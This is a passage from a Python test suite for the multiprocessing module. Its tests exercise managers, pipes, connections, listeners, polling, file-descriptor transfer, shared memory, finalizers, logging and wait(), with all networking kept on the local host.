address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
